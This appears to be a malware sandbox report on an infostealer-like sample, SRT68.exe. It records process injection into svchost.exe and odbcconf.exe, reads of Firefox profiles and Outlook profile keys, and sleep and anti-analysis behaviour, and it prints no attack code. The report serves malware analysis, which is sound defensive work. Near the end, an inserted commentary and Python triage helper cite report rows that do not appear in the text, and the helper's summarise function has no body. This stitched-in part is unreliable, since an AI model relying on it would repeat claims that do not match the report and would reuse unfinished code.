Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04EE5910
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04EFDAC6
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04EEDAAC
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E95AA0
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04EF1AA3
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04EC3A6C
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F07A46
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F0FA49
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E8DBF9
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04EC5BF0
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04E6FB80
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04F0FB76
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_02EE1E40
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_02EDAF40
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_02EDCF50
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_02EDCD30
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_02EDB086
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_02EDB090
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_02EE36CC
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_02EE36D0
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_02EE54C0
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_02EFBB30
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04CAE414
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04CAE7AD
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04CAE2F5
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: 4_2_04CAD878
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: String function: 04E3B970 appears 280 times
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: String function: 04E97E54 appears 111 times
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: String function: 04EBEA12 appears 86 times
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: String function: 04ECF290 appears 105 times
Source: C:\Windows\SysWOW64\odbcconf.exe | Code function: String function: 04E85130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03787E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 037BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03775130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0372B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 037AEA12 appears 86 times
Source: C:\Users\user\Desktop\SRT68.exe | Code function: String function: 00FC0AE3 appears 70 times
Source: C:\Users\user\Desktop\SRT68.exe | Code function: String function: 00FC8900 appears 42 times
Source: C:\Users\user\Desktop\SRT68.exe | Code function: String function: 00FA7DE1 appears 35 times
Source: SRT68.exe, 00000000.00000003.1387027138.000000000400D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SRT68.exe
Source: SRT68.exe, 00000000.00000003.1384732798.0000000003E63000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs SRT68.exe
Source: SRT68.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@16/13
Source: C:\Users\user\Desktop\SRT68.exe | Code function: 0_2_0100A06A GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\SRT68.exe | Code function: 0_2_00FF81CB AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\SRT68.exe | Code function: 0_2_00FF87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\SRT68.exe | Code function: 0_2_0100B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\SRT68.exe | Code function: 0_2_0101EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\Desktop\SRT68.exe | Code function: 0_2_0100C397 CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\Desktop\SRT68.exe | Code function: 0_2_00FA4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\SRT68.exe | File created: C:\Users\user\AppData\Local\Temp\autE66D.tmp
Source: SRT68.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\SRT68.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: odbcconf.exe, 00000004.00000002.3834317306.000000000329F000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3834317306.00000000032C2000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3834317306.0000000003294000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000003.1685575934.0000000003294000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SRT68.exe | ReversingLabs: Detection: 50%
Source: SRT68.exe | Virustotal: Detection: 32%
Source: unknown | Process created: C:\Users\user\Desktop\SRT68.exe "C:\Users\user\Desktop\SRT68.exe"
Source: C:\Users\user\Desktop\SRT68.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SRT68.exe"
Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe | Process created: C:\Windows\SysWOW64\odbcconf.exe "C:\Windows\SysWOW64\odbcconf.exe"
Source: C:\Windows\SysWOW64\odbcconf.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\SRT68.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\SRT68.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\SRT68.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\SRT68.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\SRT68.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\SRT68.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\SRT68.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\SRT68.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\SRT68.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\SRT68.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\SRT68.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\SRT68.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\odbcconf.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\odbcconf.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\odbcconf.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\odbcconf.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\odbcconf.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\odbcconf.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\odbcconf.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\odbcconf.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\odbcconf.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\odbcconf.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\odbcconf.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\odbcconf.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\odbcconf.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\odbcconf.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\odbcconf.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\odbcconf.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\odbcconf.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\odbcconf.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\odbcconf.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\odbcconf.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\odbcconf.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\odbcconf.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\odbcconf.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\odbcconf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\odbcconf.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: SRT68.exe | Static file information: File size 1211392 > 1048576
Source: SRT68.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SRT68.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SRT68.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SRT68.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SRT68.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SRT68.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SRT68.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: VdxisCThGA.exe, 00000003.00000000.1410310417.000000000030E000.00000002.00000001.01000000.00000004.sdmp, VdxisCThGA.exe, 00000006.00000000.1569343495.000000000030E000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP | source: SRT68.exe, 00000000.00000003.1386649368.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, SRT68.exe, 00000000.00000003.1387447363.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1389053744.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488922388.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488922388.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1391476823.0000000003500000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3835765715.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000003.1498460984.0000000004AA0000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000003.1500728180.0000000004C5D000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3835765715.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: SRT68.exe, 00000000.00000003.1386649368.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, SRT68.exe, 00000000.00000003.1387447363.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1389053744.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488922388.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488922388.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1391476823.0000000003500000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, odbcconf.exe, 00000004.00000002.3835765715.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000003.1498460984.0000000004AA0000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000003.1500728180.0000000004C5D000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3835765715.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: odbcconf.exe, 00000004.00000002.3834317306.0000000003213000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3836668787.000000000543C000.00000004.10000000.00040000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000000.1570186460.0000000002DAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1794476938.00000000309AC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: odbcconf.exe, 00000004.00000002.3834317306.0000000003213000.00000004.00000020.00020000.00000000.sdmp, odbcconf.exe, 00000004.00000002.3836668787.000000000543C000.00000004.10000000.00040000.00000000.sdmp, VdxisCThGA.exe, 00000006.00000000.1570186460.0000000002DAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1794476938.00000000309AC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: odbcconf.pdb | source: svchost.exe, 00000002.00000003.1456315544.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488812464.0000000003000000.00000004.00000020.00020000.00000000.sdmp, VdxisCThGA.exe, 00000003.00000003.1426555684.000000000100B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: odbcconf.pdbGCTL | source: svchost.exe, 00000002.00000003.1456315544.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1488812464.0000000003000000.00000004.00000020.00020000.00000000.sdmp, VdxisCThGA.exe, 00000003.00000003.1426555684.000000000100B000.00000004.00000001.00020000.00000000.sdmp
Source: SRT68.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SRT68.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SRT68.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SRT68.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SRT68.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\SRT68.exe | Code function: 0_2_00FA4B37 LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\SRT68.exe | Code function: 0_2_00FC8945 push ecx; ret 0_2_00FC8958
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00419071 push edx; iretd 2_2_00419072
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042D0D3 push ss; ret 2_2_0042D17B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403080 push eax; ret 2_2_00403082
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00412167 push ebx; iretd 2_2_004121AF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040D2E7 push 156EFA12h; iretd 2_2_0040D2EC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00411B18 push esi; retf 2_2_00411B25
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00405B38 push eax; ret 2_2_00405B42
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041A4F3 push edi; iretd 2_2_0041A4FE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004235A3 push edx; retf 2_2_004235CE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040D61F push eax; ret 2_2_0040D621
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040D637 push eax; ret 2_2_0040D621
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004156F7 push edx; ret 2_2_00415709
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0370225F pushad ; ret 2_2_037027F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037027FA pushad ; ret 2_2_037027F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037309AD push ecx; mov dword ptr [esp], ecx 2_2_037309B6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0370283D push eax; iretd 2_2_03702858
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E127FA pushad ; ret 4_2_04E127F9
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E1225F pushad ; ret 4_2_04E127F9
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E1283D push eax; iretd 4_2_04E12858
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_04E409AD push ecx; mov dword ptr [esp], ecx4_2_04E409B6
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EDE37E push esi; iretd 4_2_02EDE337
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EDE373 pushad ; retf 4_2_02EDE374
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EDE329 push esi; iretd 4_2_02EDE337
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EDE330 push esi; iretd 4_2_02EDE337
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EFA050 push ss; ret 4_2_02EFA0F8
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EE2674 push edx; ret 4_2_02EE2686
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EE4558 push ecx; ret 4_2_02EE455A
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EF0520 push edx; retf 4_2_02EF054B
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02ED2AB5 push eax; ret 4_2_02ED2ABF
                Source: C:\Windows\SysWOW64\odbcconf.exeCode function: 4_2_02EDEA95 push esi; retf 4_2_02EDEAA2
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FA48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00FA48D7
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_01025376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_01025376
                Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FC3187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00FC3187
                Source: C:\Users\user\Desktop\SRT68.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\SRT68.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\odbcconf.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\odbcconf.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\odbcconf.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\odbcconf.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\odbcconf.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\SRT68.exe API/Special instruction interceptor: Address: 15B19EC
                Source: C:\Windows\SysWOW64\odbcconf.exe API/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\odbcconf.exe API/Special instruction interceptor: Address: 7FFBCB7AD7E4
                Source: C:\Windows\SysWOW64\odbcconf.exe API/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\odbcconf.exe API/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\odbcconf.exe API/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\odbcconf.exe API/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\odbcconf.exe API/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\odbcconf.exe API/Special instruction interceptor: Address: 7FFBCB7ADA44
                Source: SRT68.exe, 00000000.00000002.1389505669.0000000001666000.00000004.00000020.00020000.00000000.sdmp, SRT68.exe, 00000000.00000003.1378189870.00000000015FA000.00000004.00000020.00020000.00000000.sdmp, SRT68.exe, 00000000.00000003.1378288144.0000000001666000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE#
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0377096E rdtsc 2_2_0377096E
                Source: C:\Windows\SysWOW64\odbcconf.exe Window / User API: threadDelayed 9732
                Source: C:\Users\user\Desktop\SRT68.exe API coverage: 4.3 %
                Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\odbcconf.exe API coverage: 2.6 %
                Source: C:\Windows\SysWOW64\odbcconf.exe TID: 7628 Thread sleep count: 241 > 30
                Source: C:\Windows\SysWOW64\odbcconf.exe TID: 7628 Thread sleep time: -482000s >= -30000s
                Source: C:\Windows\SysWOW64\odbcconf.exe TID: 7628 Thread sleep count: 9732 > 30
                Source: C:\Windows\SysWOW64\odbcconf.exe TID: 7628 Thread sleep time: -19464000s >= -30000s
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe TID: 7780 Thread sleep time: -65000s >= -30000s
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe TID: 7780 Thread sleep count: 41 > 30
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe TID: 7780 Thread sleep time: -61500s >= -30000s
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe TID: 7780 Thread sleep count: 41 > 30
                Source: C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe TID: 7780 Thread sleep time: -41000s >= -30000s
                Source: C:\Windows\SysWOW64\odbcconf.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\odbcconf.exe Last function: Thread delayed
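                The thread-sleep rows above and the anti-debugging rows further down (DebugPort query, IsDebuggerPresent, rdtsc, and the long run of mov eax, dword ptr fs:[00000030h] reads) are the parts of this report an analyst actually triages, so the following added example shows how to turn them into a per-process summary. It is not code from the report or from Joe Sandbox; it parses rows in the flattened "Source: <process> ..." layout used here. Two things it makes explicit: the "Thread sleep time" totals in this report are exactly count x 2000 (482000 / 241 and 19464000 / 9732), i.e. one fixed-delay loop rather than varied sleeps, and a fs:[30h] read on 32-bit Windows only loads the PEB pointer, so the rows tell you the PEB is consulted (BeingDebugged at offset 2 and NtGlobalFlag at 0x68 are the usual targets) but not which field is read. The unit label "s" on the sleep totals is the report's own; the code only uses the ratio. The sample rows are copied (abridged) from this report; the signal names and the "DebugPort means NtQueryInformationProcess(ProcessDebugPort)" reading are the author's assumptions, not something the report states.

```python
"""Triage helper for Joe Sandbox-style signature rows.

Added example, not part of the original report or of Joe Sandbox. It parses
the flattened 'Source: <process> ...' rows, tallies anti-debugging and
sandbox-evasion signals per process, and reconstructs the sleep loops from
the paired 'Thread sleep count' / 'Thread sleep time' rows.
"""
import re
from collections import defaultdict

# Rows copied (abridged) from the report above; the analysis IDs and
# addresses are the report's own values, nothing here is invented.
SAMPLE_ROWS = r"""
Source: C:\Windows\SysWOW64\odbcconf.exe TID: 7628Thread sleep count: 241 > 30
Source: C:\Windows\SysWOW64\odbcconf.exe TID: 7628Thread sleep time: -482000s >= -30000s
Source: C:\Windows\SysWOW64\odbcconf.exe TID: 7628Thread sleep count: 9732 > 30
Source: C:\Windows\SysWOW64\odbcconf.exe TID: 7628Thread sleep time: -19464000s >= -30000s
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov eax, dword ptr fs:[00000030h]2_2_037B035C
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B035C mov ecx, dword ptr fs:[00000030h]2_2_037B035C
Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_00FA3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,0_2_00FA3B3A
Source: C:\Users\user\Desktop\SRT68.exeCode function: 0_2_015B0648 mov eax, dword ptr fs:[00000030h]0_2_015B0648
"""

# The process path ends at the first ".exe"; an optional " TID: n" follows, and
# the rest of the row is the signature text that extraction fused onto the path.
ROW = re.compile(r"^Source:\s*(?P<proc>.+?\.exe)(?:\s+TID:\s*(?P<tid>\d+))?(?P<rest>.*)$")

SIGNALS = {
    # mov reg, fs:[30h] loads the PEB pointer (BeingDebugged / NtGlobalFlag live there)
    "peb_access": re.compile(r"fs:\[00000030h\]"),
    # rdtsc around a code region is the classic timing check for single-stepping
    "rdtsc": re.compile(r"\brdtsc\b"),
    # assumed reading: NtQueryInformationProcess(ProcessDebugPort) seen by the hook
    "debugport_query": re.compile(r"Process queried:\s*DebugPort"),
    "isdebuggerpresent": re.compile(r"\bIsDebuggerPresent\b"),
}
SLEEP_COUNT = re.compile(r"Thread sleep count:\s*(\d+)")
SLEEP_TIME = re.compile(r"Thread sleep time:\s*-?(\d+)s")


def parse_rows(text):
    """Yield (process, tid, rest) for every 'Source:' row, skipping other lines."""
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            yield m.group("proc"), m.group("tid"), m.group("rest")


def summarise(text):
    """Per-process signal counts plus reconstructed sleep loops.

    The report emits a 'sleep count' row followed by the matching 'sleep time'
    row for the same thread; the total is count * per-call delay, so dividing
    recovers the fixed delay the loop used.
    """
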